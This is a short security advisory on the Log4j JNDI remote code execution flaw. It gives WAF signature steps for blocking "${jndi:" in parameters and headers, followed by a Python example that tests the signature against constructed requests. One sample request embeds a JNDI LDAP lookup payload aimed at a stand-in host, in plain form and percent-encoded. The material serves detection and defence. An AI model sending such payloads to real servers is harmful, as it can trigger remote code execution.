Recently a new zero-day vulnerability was discovered in Log4j, which has not yet been officially assigned a CVE.
Vulnerability description:
Log4j versions prior to 2.15.0 are subject to a remote code execution vulnerability via the ldap JNDI parser.
Mitigation:
Cloud WAF customers and On-Prem customers that have the “SecureSphere Emergency Feed” are already protected OOTB.
Below are the manual mitigation steps to address the vulnerability:
- Create a new manual dictionary, or use an existing one (ensure it is applied in a policy).
- Create a new signature (inside the dictionary from the previous step):
  - Signature name: Zero day RCE in Log4j via ldap JNDI parser
  - Signature pattern: part="${jndi:"
  - Search Signature in: Parameters, Headers
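To see what the signature above does, here is an added example (not part of this advisory or of any WAF product) that applies the literal `${jndi:` pattern to the URL-decoded parameters and the headers of a raw HTTP request, the two locations the signature is configured to search; the sample requests, host names and the `parse_request`/`match_signature` helpers are constructed for illustration.

```python
from urllib.parse import parse_qsl, urlsplit

# Literal signature pattern from the advisory, matched against
# decoded parameter values and header values.
SIGNATURE = "${jndi:"


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (headers, parameters).

    Parameters come from the query string and, for form bodies, from the
    body; values are URL-decoded first, as a WAF does before matching.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    _, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if "application/x-www-form-urlencoded" in headers.get("Content-Type", ""):
        params += parse_qsl(body, keep_blank_values=True)
    return headers, params


def match_signature(raw: str):
    """Return (location, name) pairs where the signature matched."""
    headers, params = parse_request(raw)
    hits = [("header", n) for n, v in headers.items() if SIGNATURE in v]
    hits += [("parameter", n) for n, v in params if SIGNATURE in v]
    return hits


# Constructed sample requests (not captured traffic).
BENIGN = (
    "GET /search?q=log4j+mitigation HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "User-Agent: curl/7.68.0\r\n\r\n"
)
# Pattern appears once in a header and once percent-encoded in a
# query parameter; the latter is only visible after URL decoding.
SUSPICIOUS = (
    "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Ftest.invalid%2Fx%7D HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "User-Agent: ${jndi:ldap://test.invalid/x}\r\n\r\n"
)

if __name__ == "__main__":
    print(match_signature(BENIGN))      # []
    print(match_signature(SUSPICIOUS))  # [('header', 'User-Agent'), ('parameter', 'q')]
```

The encoded query parameter shows why the signature must be applied after decoding: the raw request line never contains the literal `${jndi:` string.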